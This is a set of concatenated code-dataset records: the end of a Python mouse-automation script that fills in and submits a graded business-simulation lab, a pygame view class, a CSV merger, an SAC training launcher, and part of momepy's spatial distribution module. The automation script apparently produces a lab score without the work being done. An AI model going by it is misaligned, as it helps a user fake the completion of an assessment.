风险控制原则\n select_option(1297, 547, 1277, 638)\n select_option(1278, 590, 1281, 651)\n select_option(1285, 632, 1263, 712)\n select_option(1311, 678, 1284, 748)\n # 点击提交\n mouse_click(1321, 744)\n time.sleep(5)\n mouse_click(941, 700)\n time.sleep(5)\n much_mouse_click(1116, 760, 2)\n time.sleep(30)\n\n# marketing_module()\n\ndef profit_and_loss_measurement_module():\n \"\"\"损益测算模块\"\"\"\n much_mouse_click(1116, 760, 9, 3)\n time.sleep(5)\n # 调整概率\n pull_mouse(908, 460, 945, 456)\n pull_mouse(885, 498, 908, 501)\n mouse_click_and_input_content(941, 597, '21088.550')\n mouse_click_and_input_content(943, 623, '7039.944')\n mouse_click_and_input_content(942, 658, '18216.000')\n mouse_click(943, 698)\n time.sleep(5)\n mouse_click(946, 712)\n time.sleep(5)\n # 设定计算参数\n mouse_click(1074, 469)\n mouse_click(1074, 498)\n mouse_click_and_input_content(1121, 557, '40')\n mouse_click_and_input_content(1124, 591, '800')\n mouse_click_and_input_content(1121, 622, '2540')\n mouse_click(943, 657)\n time.sleep(5)\n mouse_click(946, 650)\n time.sleep(5)\n # 计算变动成本\n pull_mouse(980, 519, 997, 517)\n 
mouse_click_and_input_content(947, 601, '2000')\n mouse_click(951, 655)\n time.sleep(5)\n mouse_click(947, 655)\n # 产品损益表\n mouse_click_and_input_content(995, 540, '16548.550')\n mouse_click_and_input_content(997, 564, '2499.944')\n mouse_click_and_input_content(993, 586, '13676.000')\n mouse_click(943, 635)\n time.sleep(2)\n mouse_click(1180, 734)\n mouse_click(1256, 722)\n much_mouse_click(1116, 760, 3, 2)\n time.sleep(2)\n much_mouse_click(1116, 760, 2, 2)\n # 点击记录\n time.sleep(6)\n mouse_click(1049, 530)\n\n# profit_and_loss_measurement_module(user_dir)\n\n\n\ndef submit_file_firefox_in_shiyanshi():\n png.moveTo(642, 1006, duration=1)\n png.click()\n time.sleep(10) \n png.moveTo(67, 142, duration=2)\n png.click()\n png.moveTo(204, 140, duration=2)\n png.click()\n png.moveTo(777, 508, duration=2)\n png.click()\n time.sleep(20)\n png.moveTo(1911, 540, duration=1)\n png.dragTo(1911, 800, duration=3)\n time.sleep(10)\n # 点击提交\n png.moveTo(951, 907, duration=2)\n png.click()\n pass\n\n\n\ntime.sleep(30)\nlogger.info(\"前期配置开始\")\nbasis('C:\\\\Users\\\\Public\\\\Pictures')\n\nlogger.info(\"资源配置开始\")\nresource_configuration_module()\n\nlogger.info(\"商业配置开始\")\nbusiness_design_module()\n\nlogger.info(\"市场配置开始\")\nmarketing_module()\n\nlogger.info(\"利润损失配置开始\")\nprofit_and_loss_measurement_module()\n\n\ntime.sleep(30)\nwinsound.Beep(300, 1000)\ninput(\"准备开始提交流程: \")\nsubmit_file_firefox_in_shiyanshi()\n\n\ntime.sleep(40)\nsave_picture(0, 0, 1900, 900, 'C:\\\\Users\\\\Public\\\\Pictures', '实验成绩截图')\ntime.sleep(10000)\n\n\n\n\n\n\n\n","sub_path":"fangzhen/process3.py","file_name":"process3.py","file_ext":"py","file_size_in_byte":18241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
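The make_wrapper decorator at the top of the record above shifts the y-coordinate arguments (positions 1 and 3) by a fixed screen offset before each call. A generic version of that pattern, sketched with illustrative names (offset_args is my own helper, not from the record):

def offset_args(indices, delta):
    """Return a decorator that adds `delta` to the positional args at `indices`."""
    def deco(func):
        def wrapper(*args, **kwargs):
            shifted = [a + delta if i in indices else a for i, a in enumerate(args)]
            return func(*shifted, **kwargs)
        return wrapper
    return deco

@offset_args(indices={1, 3}, delta=41)   # shift y-coordinates, as in the record
def click(x1, y1, x2=0, y2=0):
    return (x1, y1, x2, y2)

assert click(10, 20, 30, 40) == (10, 61, 30, 81)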
+{"seq_id":"398534380","text":"import pygame\nfrom settings import *\nfrom all_image import *\nfrom color_settings import *\n\n\nclass GameView:\n def __init__(self):\n self.win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n\n def draw_bg(self):\n self.win.blit(BACKGROUND_IMAGE, (0, 0))\n\n def draw_enemies(self, enemies):\n enemies.tower.draw(self.win)\n for virus in enemies.get():\n self.win.blit(virus.image, virus.rect)\n # draw health bar\n bar_width = virus.rect.w * (virus.health / virus.max_health)\n max_bar_width = virus.rect.w\n bar_height = 5\n pygame.draw.rect(self.win, RED, [virus.rect.x, virus.rect.y - 10, max_bar_width, bar_height])\n pygame.draw.rect(self.win, GREEN, [virus.rect.x, virus.rect.y - 10, bar_width, bar_height])\n\n def draw_ally(self, allies):\n allies.tower.draw(self.win)\n for cat in allies.get():\n self.win.blit(cat.image, cat.rect)\n # draw health bar\n bar_width = cat.rect.w * (cat.health / cat.max_health)\n max_bar_width = cat.rect.w\n bar_height = 5\n pygame.draw.rect(self.win, RED, [cat.rect.x, cat.rect.y - 10, max_bar_width, bar_height])\n pygame.draw.rect(self.win, GREEN, [cat.rect.x, cat.rect.y - 10, bar_width, bar_height])\n\n def draw_menu(self, menu):\n \"\"\"the menu is the button menu in the game\"\"\"\n for but in menu.get_buttons():\n self.win.blit(but.image, but.rect)\n\n def draw_mana_bar(self, mana_group):\n max_bar_width = MANA_W\n bar_width = max_bar_width * (mana_group.mana / mana_group.max_mana)\n bar_height = 20\n pygame.draw.rect(self.win, GRAY, [MANA_X, MANA_Y, max_bar_width, bar_height])\n pygame.draw.rect(self.win, GRAY, pygame.Rect(MANA_X-5, MANA_Y-5, max_bar_width+10, bar_height+10), 2)\n pygame.draw.rect(self.win, WHITE, [MANA_X, MANA_Y, bar_width, bar_height]) # remaining mana\n\n def draw_game_over(self, game_over_type):\n game_over_type.draw(self.win)\n\n","sub_path":"game/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"285251798","text":"#! /usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\n\r\nf = open('concatenated.csv', \"w\", encoding='utf-8')\r\n\r\nheader_written = False\r\n\r\ndirs = os.listdir(os.getcwd())\r\nfor file in dirs:\r\n if (file[-4:] == \".csv\"):\r\n if os.path.isfile(file) and not file == 'concatenated.csv':\r\n for line in open(file, encoding='utf-8').readlines():\r\n if line[:14] == '\"citation_key\"':\r\n if header_written:\r\n continue\r\n f.write('\"cited\",')\r\n f.write(line)\r\n header_written = True\r\n else:\r\n f.write('\"' + file[:-4] + '\",')\r\n f.write(line)\r\nf.close()\r\n","sub_path":"concatenate_csvs/concatenate_csvs.py","file_name":"concatenate_csvs.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"79136434","text":"from multiprocessing import Process\nimport seagul.envs\n\nimport gym\nenv_name = \"su_acrobot-v0\"\nenv = gym.make(env_name)\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom numpy import pi\n\n# init policy, value fn\ninput_size = 4\noutput_size = 1\nlayer_size = 32\nnum_layers = 2\nactivation = nn.ReLU\n\nfrom seagul.rl.run_utils import run_sg\nfrom seagul.rl.sac import sac, SACModel\nfrom seagul.nn import MLP\nfrom seagul.integration import euler\n\nproc_list = []\ntrial_num = input(\"What trial is this?\\n\")\n\nm1 = 1; m2 = 1\nl1 = 1; l2 = 1\nlc1 = .5; lc2 = .5\nI1 = .2; I2 = 1.0\ng = 9.8\nmax_torque = 25\nmax_t = 10\n\n\ndef reward_fn_sq(s, a):\n reward = -.1*((s[0] - np.pi/2)**2 + s[1]**2)\n return reward, False\n\n\nfor seed in np.random.randint(0, 2 ** 32, 8):\n\n policy = MLP(input_size, output_size*2, num_layers, layer_size, activation)\n value_fn = MLP(input_size, 1, num_layers, layer_size, activation)\n q1_fn = MLP(input_size + output_size, 1, num_layers, layer_size, activation)\n q2_fn = MLP(input_size + output_size, 1, num_layers, layer_size, activation)\n\n\n model = SACModel(\n policy=policy,\n value_fn = value_fn,\n q1_fn = q1_fn,\n q2_fn = q2_fn,\n act_limit = max_torque,\n )\n\n env_config = {\n \"init_state\": [-pi/2, 0, 0, 0],\n \"max_torque\": max_torque,\n \"init_state_weights\": [np.pi, np.pi, 0, 0],\n \"dt\": .01,\n \"reward_fn\" : reward_fn_sq,\n \"max_t\" : max_t,\n \"m2\": m2,\n \"m1\": m1,\n \"l1\": l1,\n \"lc1\": lc1,\n \"lc2\": lc2,\n \"i1\": I1,\n \"i2\": I2,\n \"act_hold\" : 20,\n }\n\n alg_config = {\n \"env_name\": env_name,\n \"model\": model,\n \"seed\": seed, # int((time.time() % 1)*1e8),\n \"total_steps\" : 1e6,\n \"alpha\" : .05,\n \"exploration_steps\" : 50000,\n \"min_steps_per_update\" : 500,\n \"gamma\": 1,\n \"min_steps_per_update\" : 500,\n \"sgd_batch_size\": 128,\n \"replay_batch_size\" : 4096,\n \"iters_per_update\": 16,\n #\"iters_per_update\": float('inf'),\n \"env_config\": env_config\n }\n\n p = Process(\n target=run_sg,\n args=(alg_config, sac, \"sac-test\", \"no act hold this time\", \"/data_needle/\" + trial_num + \"/\" + \"seed\" + str(seed)),\n )\n p.start()\n proc_list.append(p)\n\n\nfor p in proc_list:\n print(\"joining\")\n p.join()\n","sub_path":"switched_rl/run_sac.py","file_name":"run_sac.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"458735895","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# distribution.py\n# definitons of spatial distribution characters\n\nfrom tqdm import tqdm # progress bar\nfrom shapely.geometry import LineString, Point\nimport numpy as np\nimport pandas as pd\nimport statistics\nimport networkx as nx\n\nfrom .utils import gdf_to_nx\nfrom .utils import nx_to_gdf\n\n\ndef orientation(objects):\n \"\"\"\n Calculate orientation (azimuth) of object\n\n Defined as an orientation of the longext axis of bounding rectangle in range 0 - 45.\n It captures the deviation of orientation from cardinal directions.\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Schirmer PM and Axhausen KW (2015) A multiscale classification of urban morphology.\n Journal of Transport and Land Use 9(1): 101–130. (adapted)\n\n Examples\n --------\n >>> buildings_df['orientation'] = momepy.orientation(buildings_df)\n Calculating orientations...\n 100%|██████████| 144/144 [00:00<00:00, 630.54it/s]\n Orientations calculated.\n >>> buildings_df['orientation'][0]\n 41.05146788287027\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating orientations...')\n\n def _azimuth(point1, point2):\n '''azimuth between 2 shapely points (interval 0 - 180)'''\n angle = np.arctan2(point2.x - point1.x, point2.y - point1.y)\n return np.degrees(angle)if angle > 0 else np.degrees(angle) + 180\n\n # iterating over rows one by one\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n bbox = list(row['geometry'].minimum_rotated_rectangle.exterior.coords)\n centroid_ab = LineString([bbox[0], bbox[1]]).centroid\n centroid_cd = LineString([bbox[2], bbox[3]]).centroid\n axis1 = centroid_ab.distance(centroid_cd)\n\n centroid_bc = LineString([bbox[1], bbox[2]]).centroid\n centroid_da = LineString([bbox[3], bbox[0]]).centroid\n axis2 = centroid_bc.distance(centroid_da)\n\n if axis1 <= axis2:\n az = _azimuth(centroid_bc, centroid_da)\n if 90 > az >= 45:\n diff = az - 45\n az = az - 2 * diff\n elif 135 > az >= 90:\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n elif 181 > az >= 135:\n diff = az - 135\n az = az - 2 * diff\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n results_list.append(az)\n else:\n az = 170\n az = _azimuth(centroid_ab, centroid_cd)\n if 90 > az >= 45:\n diff = az - 45\n az = az - 2 * diff\n elif 135 > az >= 90:\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n elif 181 > az >= 135:\n diff = az - 135\n az = az - 2 * diff\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n results_list.append(az)\n\n series = pd.Series(results_list)\n print('Orientations calculated.')\n return series\n\n\ndef shared_walls_ratio(objects, unique_id, perimeters=None):\n \"\"\"\n Calculate shared walls ratio\n\n .. 
math::\n \\\\textit{length of shared walls} \\\\over perimeter\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n unique_id : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series with unique id\n perimeters : str, list, np.array, pd.Series (default None)\n the name of the dataframe column, np.array, or pd.Series where is stored perimeter value\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Hamaina R, Leduc T and Moreau G (2012) Towards Urban Fabrics Characterization\n Based on Buildings Footprints. In: Lecture Notes in Geoinformation and Cartography,\n Berlin, Heidelberg: Springer Berlin Heidelberg, pp. 327–346. Available from:\n https://link.springer.com/chapter/10.1007/978-3-642-29063-3_18.\n\n Examples\n --------\n >>> buildings_df['swr'] = momepy.shared_walls_ratio(buildings_df, 'uID')\n Generating spatial index...\n Calculating shared walls ratio...\n 100%|██████████| 144/144 [00:00<00:00, 648.72it/s]\n Shared walls ratio calculated.\n >>> buildings_df['swr'][10]\n 0.3424804411228673\n \"\"\"\n print('Generating spatial index...')\n sindex = objects.sindex # define rtree index\n # define empty list for results\n results_list = []\n\n print('Calculating shared walls ratio...')\n\n if perimeters is None:\n objects['mm_p'] = objects.geometry.length\n perimeters = 'mm_p'\n else:\n if not isinstance(perimeters, str):\n objects['mm_p'] = perimeters\n perimeters = 'mm_p'\n if not isinstance(unique_id, str):\n objects['mm_uid'] = unique_id\n unique_id = 'mm_uid'\n\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n neighbors = list(sindex.intersection(row.geometry.bounds))\n neighbors.remove(index)\n\n # if no neighbour exists\n length = 0\n if not neighbors:\n results_list.append(0)\n else:\n for i in neighbors:\n subset = objects.loc[i]['geometry']\n length = length + row.geometry.intersection(subset).length\n results_list.append(length / row[perimeters])\n series = pd.Series(results_list)\n print('Shared walls ratio calculated.')\n if 'mm_p' in objects.columns:\n objects.drop(columns=['mm_p'], inplace=True)\n if 'mm_uid' in objects.columns:\n objects.drop(columns=['mm_uid'], inplace=True)\n return series\n\n\ndef street_alignment(objects, streets, orientations, network_id_objects, network_id_streets):\n \"\"\"\n Calculate the difference between street orientation and orientation of object in degrees\n\n Orientation of street segment is represented by the orientation of line\n connecting first and last point of the segment. Network ID linking each object\n to specific street segment is needed. Can be generated by :py:func:`momepy.get_network_id`.\n\n .. 
math::\n \\\\left|{\\\\textit{building orientation} - \\\\textit{street orientation}}\\\\right|\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n streets : GeoDataFrame\n GeoDataFrame containing street network\n orientations : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object orientation value\n (can be calculated using :py:func:`momepy.orientation`)\n network_id_objects : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object network ID\n network_id_streets : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series of streets with unique network id (has to be defined beforehand)\n (can be defined using :py:func:`momepy.elements.unique_id`)\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n Examples\n --------\n >>> buildings_df['street_alignment'] = momepy.street_alignment(buildings_df, streets_df, 'orientation', 'nID', 'nID')\n Calculating street alignments...\n 100%|██████████| 144/144 [00:00<00:00, 529.94it/s]\n Street alignments calculated.\n >>> buildings_df['street_alignment'][0]\n 0.29073888476702336\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating street alignments...')\n\n if not isinstance(orientations, str):\n objects['mm_o'] = orientations\n orientations = 'mm_o'\n if not isinstance(network_id_objects, str):\n objects['mm_nid'] = network_id_objects\n network_id_objects = 'mm_nid'\n if not isinstance(network_id_streets, str):\n streets['mm_nis'] = network_id_streets\n network_id_streets = 'mm_nis'\n\n def azimuth(point1, point2):\n '''azimuth between 2 shapely points (interval 0 - 180)'''\n angle = np.arctan2(point2.x - point1.x, point2.y - point1.y)\n return np.degrees(angle)if angle > 0 else np.degrees(angle) + 180\n\n # iterating over rows one by one\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n if pd.isnull(row[network_id_objects]):\n results_list.append(0)\n else:\n network_id = row[network_id_objects]\n streetssub = streets.loc[streets[network_id_streets] == network_id]\n start = Point(streetssub.iloc[0]['geometry'].coords[0])\n end = Point(streetssub.iloc[0]['geometry'].coords[-1])\n az = azimuth(start, end)\n if 90 > az >= 45:\n diff = az - 45\n az = az - 2 * diff\n elif 135 > az >= 90:\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n elif 181 > az >= 135:\n diff = az - 135\n az = az - 2 * diff\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n results_list.append(abs(row[orientations] - az))\n series = pd.Series(results_list)\n if 'mm_o' in objects.columns:\n objects.drop(columns=['mm_o'], inplace=True)\n if 'mm_nid' in objects.columns:\n objects.drop(columns=['mm_nid'], inplace=True)\n if 'mm_nis' in streets.columns:\n streets.drop(columns=['mm_nis'], inplace=True)\n print('Street alignments calculated.')\n return series\n\n\ndef cell_alignment(objects, tessellation, orientations, cell_orientations, unique_id):\n \"\"\"\n Calculate the difference between cell orientation and orientation of object\n\n .. 
math::\n \\\\left|{\\\\textit{building orientation} - \\\\textit{cell orientation}}\\\\right|\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n tessellation : GeoDataFrame\n GeoDataFrame containing street network\n orientations : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object orientation value\n (can be calculated using :py:func:`momepy.orientation`)\n cell_orientations : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object orientation value\n (can be calculated using :py:func:`momepy.orientation`)\n unique_id : str\n the name of the dataframe column with unique id shared between a cell and a building\n (must be present in both geodataframes)\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n Examples\n --------\n >>> buildings_df['cell_alignment'] = momepy.cell_alignment(buildings_df, tessellation_df, 'bl_orient', 'tes_orient', 'uID')\n Calculating cell alignments...\n 100%|██████████| 144/144 [00:00<00:00, 799.09it/s]\n Cell alignments calculated.\n >>> buildings_df['cell_alignment'][0]\n 0.8795123936951939\n\n Notes\n -----\n Allow left unique_id and right unique_id.\n \"\"\"\n print('Calculating cell alignments...')\n\n if not isinstance(orientations, str):\n objects['mm_o'] = orientations\n orientations = 'mm_o'\n if not isinstance(cell_orientations, str):\n tessellation['mm_o'] = cell_orientations\n cell_orientations = 'mm_o'\n\n # define empty list for results\n results_list = []\n\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n\n results_list.append(abs(row[orientations] - tessellation[tessellation[unique_id] == row[unique_id]][cell_orientations].iloc[0]))\n\n series = pd.Series(results_list)\n if 'mm_o' in objects.columns:\n objects.drop(columns=['mm_o'], inplace=True)\n if 'mm_o' in tessellation.columns:\n tessellation.drop(columns=['mm_o'], inplace=True)\n print('Cell alignments calculated.')\n return series\n\n\n\ndef alignment(objects, orientations, tessellation, unique_id, spatial_weights=None):\n\n \"\"\"\n Calculate the mean deviation of solar orientation of objects on adjacent cells from an object\n\n .. 
math::\n \\\\frac{1}{n}\\\\sum_{i=1}^n dev_i=\\\\frac{dev_1+dev_2+\\\\cdots+dev_n}{n}\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n orientations : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object orientation value\n (can be calculated using :py:func:`momepy.orientation`)\n tessellation : GeoDataFrame\n GeoDataFrame containing morphological tessellation - source of weights_matrix.\n It is crucial to use exactly same input as was used during the calculation of weights matrix.\n If weights_matrix is None, tessellation is used to calulate it.\n unique_id : str\n the name of the dataframe column with unique id shared between a cell and a building\n (must be present in both geodataframes)\n spatial_weights : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n Examples\n --------\n >>> buildings_df['alignment'] = momepy.alignment(buildings_df, 'bl_orient', tessellation_df, 'uID')\n Calculating alignments...\n Calculating spatial weights...\n Spatial weights ready...\n 100%|██████████| 144/144 [00:01<00:00, 140.84it/s]\n Alignments calculated.\n >>> buildings_df['alignment'][0]\n 18.299481296455237\n \"\"\"\n # define empty list for results\n results_list = []\n\n if not isinstance(orientations, str):\n objects['mm_o'] = orientations\n orientations = 'mm_o'\n\n print('Calculating alignments...')\n\n if not all(tessellation.index == range(len(tessellation))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n if spatial_weights is None:\n print('Calculating spatial weights...')\n from libpysal.weights import Queen\n spatial_weights = Queen.from_dataframe(tessellation)\n print('Spatial weights ready...')\n\n # iterating over rows one by one\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n uid = tessellation.loc[tessellation[unique_id] == row[unique_id]].index[0]\n neighbours = spatial_weights.neighbors[uid]\n neighbours_ids = []\n\n for n in neighbours:\n uniq = tessellation.iloc[n][unique_id]\n neighbours_ids.append(uniq)\n\n orientation = []\n for i in neighbours_ids:\n ori = objects.loc[objects[unique_id] == i].iloc[0][orientations]\n orientation.append(ori)\n\n deviations = []\n for o in orientation:\n dev = abs(o - row[orientations])\n deviations.append(dev)\n\n if deviations:\n results_list.append(statistics.mean(deviations))\n else:\n results_list.append(0)\n\n series = pd.Series(results_list)\n\n if 'mm_o' in objects.columns:\n objects.drop(columns=['mm_o'], inplace=True)\n\n print('Alignments calculated.')\n return series\n\n\ndef neighbour_distance(objects, tessellation, unique_id, spatial_weights=None):\n \"\"\"\n Calculate the mean distance to buildings on adjacent cells\n\n .. 
math::\n \\\\frac{1}{n}\\\\sum_{i=1}^n dist_i=\\\\frac{dist_1+dist_2+\\\\cdots+dist_n}{n}\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n tessellation : GeoDataFrame\n GeoDataFrame containing morphological tessellation - source of spatial_weights.\n It is crucial to use exactly same input as was used durign the calculation of weights matrix.\n If spatial_weights is None, tessellation is used to calulate it.\n unique_id : str\n name of the column with unique id\n spatial_weights : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Schirmer PM and Axhausen KW (2015) A multiscale classification of urban morphology.\n Journal of Transport and Land Use 9(1): 101–130.\n\n Examples\n --------\n >>> buildings_df['neighbour_distance'] = momepy.neighbour_distance(buildings_df, tessellation_df, 'uID')\n Calculating distances...\n Calculating spatial weights...\n Spatial weights ready...\n 100%|██████████| 144/144 [00:00<00:00, 345.78it/s]\n Distances calculated.\n >>> buildings_df['neighbour_distance'][0]\n 29.18589019096464\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating distances...')\n\n if not all(tessellation.index == range(len(tessellation))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n if spatial_weights is None:\n print('Calculating spatial weights...')\n from libpysal.weights import Queen\n spatial_weights = Queen.from_dataframe(tessellation)\n print('Spatial weights ready...')\n\n # iterating over rows one by one\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n uid = tessellation.loc[tessellation[unique_id] == row[unique_id]].index[0]\n neighbours = spatial_weights.neighbors[uid]\n\n neighbours_ids = tessellation.iloc[neighbours][unique_id]\n building_neighbours = objects.loc[objects[unique_id].isin(neighbours_ids)]\n if len(building_neighbours) > 0:\n results_list.append(np.mean(building_neighbours.geometry.distance(row['geometry'])))\n else:\n results_list.append(0)\n\n series = pd.Series(results_list)\n\n print('Distances calculated.')\n return series\n\n\ndef mean_interbuilding_distance(objects, tessellation, unique_id, spatial_weights=None, spatial_weights_higher=None, order=3):\n \"\"\"\n Calculate the mean interbuilding distance within x topological steps\n\n Interbuilding distances are calculated between buildings on adjacent cells based on `spatial_weights`.\n\n .. 
math::\n\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n tessellation : GeoDataFrame\n GeoDataFrame containing morphological tessellation - source of spatial_weights and spatial_weights_higher.\n It is crucial to use exactly same input as was used durign the calculation of weights matrix and spatial_weights_higher.\n If spatial_weights or spatial_weights_higher is None, tessellation is used to calulate it.\n unique_id : str\n name of the column with unique id\n spatial_weights : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n spatial_weights_higher : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity of higher order will be calculated\n based on tessellation\n order : int\n Order of Queen contiguity\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n ADD, but it is adapted quite a lot.\n\n Notes\n -----\n Fix terminology, it is unclear.\n Fix UserWarning.\n\n Examples\n --------\n >>> buildings_df['mean_interbuilding_distance'] = momepy.mean_interbuilding_distance(buildings_df, tessellation_df, 'uID')\n Calculating mean interbuilding distances...\n Generating weights matrix (Queen)...\n Generating weights matrix (Queen) of 3 topological steps...\n Generating adjacency matrix based on weights matrix...\n Computing interbuilding distances...\n 100%|██████████| 746/746 [00:03<00:00, 200.14it/s]\n Computing mean interbuilding distances...\n 100%|██████████| 144/144 [00:00<00:00, 317.42it/s]\n Mean interbuilding distances calculated.\n >>> buildings_df['mean_interbuilding_distance'][0]\n 29.305457092042744\n \"\"\"\n if not all(tessellation.index == range(len(tessellation))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n print('Calculating mean interbuilding distances...')\n if spatial_weights is None:\n print('Generating weights matrix (Queen)...')\n from libpysal.weights import Queen\n # matrix to capture interbuilding relationship\n spatial_weights = Queen.from_dataframe(tessellation)\n\n if spatial_weights_higher is None:\n print('Generating weights matrix (Queen) of {} topological steps...'.format(order))\n from momepy import Queen_higher\n # matrix to define area of analysis (more steps)\n spatial_weights_higher = Queen_higher(k=order, geodataframe=tessellation)\n\n # define empty list for results\n results_list = []\n\n print('Generating adjacency matrix based on weights matrix...')\n # define adjacency list from lipysal\n adj_list = spatial_weights.to_adjlist()\n adj_list['distance'] = -1\n\n print('Computing interbuilding distances...')\n # measure each interbuilding distance of neighbours and save them to adjacency list\n for index, row in tqdm(adj_list.iterrows(), total=adj_list.shape[0]):\n inverted = adj_list[(adj_list.focal == row.neighbor)][(adj_list.neighbor == row.focal)].iloc[0]['distance']\n if inverted == -1:\n object_id = tessellation.iloc[row.focal.astype(int)][unique_id]\n building_object = objects.loc[objects[unique_id] == object_id]\n\n neighbours_id = tessellation.iloc[row.neighbor.astype(int)][unique_id]\n building_neighbour = objects.loc[objects[unique_id] == neighbours_id]\n adj_list.loc[index, 'distance'] = building_neighbour.iloc[0].geometry.distance(building_object.iloc[0].geometry)\n else:\n adj_list.at[index, 'distance'] = inverted\n\n print('Computing mean interbuilding distances...')\n # iterate 
over objects to get the final values\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n # id to match spatial weights\n uid = tessellation.loc[tessellation[unique_id] == row[unique_id]].index[0]\n # define neighbours based on weights matrix defining analysis area\n neighbours = spatial_weights_higher.neighbors[uid]\n neighbours.append(uid)\n if neighbours:\n selection = adj_list[adj_list.focal.isin(neighbours)][adj_list.neighbor.isin(neighbours)]\n results_list.append(np.nanmean(selection.distance))\n\n series = pd.Series(results_list)\n print('Mean interbuilding distances calculated.')\n return series\n\n\ndef neighbouring_street_orientation_deviation(objects):\n \"\"\"\n Calculate the mean deviation of solar orientation of adjacent streets\n\n Orientation of street segment is represented by the orientation of line\n connecting first and last point of the segment.\n\n .. math::\n \\\\frac{1}{n}\\\\sum_{i=1}^n dev_i=\\\\frac{dev_1+dev_2+\\\\cdots+dev_n}{n}\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing street network to analyse\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n Examples\n --------\n >>> streets_df['orient_dev'] = momepy.neighbouring_street_orientation_deviation(streets_df)\n Calculating street alignments...\n Preparing street orientations...\n Generating spatial index...\n 100%|██████████| 33/33 [00:00<00:00, 249.02it/s]\n Street alignments calculated.\n >>> streets_df['orient_dev'][6]\n 7.043096518688273\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating street alignments...')\n\n def azimuth(point1, point2):\n '''azimuth between 2 shapely points (interval 0 - 180)'''\n angle = np.arctan2(point2.x - point1.x, point2.y - point1.y)\n return np.degrees(angle) if angle > 0 else np.degrees(angle) + 180\n\n # iterating over rows one by one\n print(' Preparing street orientations...')\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n\n start = Point(row['geometry'].coords[0])\n end = Point(row['geometry'].coords[-1])\n az = azimuth(start, end)\n if 90 > az >= 45:\n diff = az - 45\n az = az - 2 * diff\n elif 135 > az >= 90:\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n elif 181 > az >= 135:\n diff = az - 135\n az = az - 2 * diff\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n results_list.append(az)\n series = pd.Series(results_list)\n\n objects['tmporient'] = series\n\n print(' Generating spatial index...')\n sindex = objects.sindex\n results_list = []\n\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n possible_neighbors_idx = list(sindex.intersection(row.geometry.bounds))\n possible_neighbours = objects.iloc[possible_neighbors_idx]\n neighbors = possible_neighbours[possible_neighbours.intersects(row.geometry)]\n neighbors = neighbors.drop([index]) # drop returns a 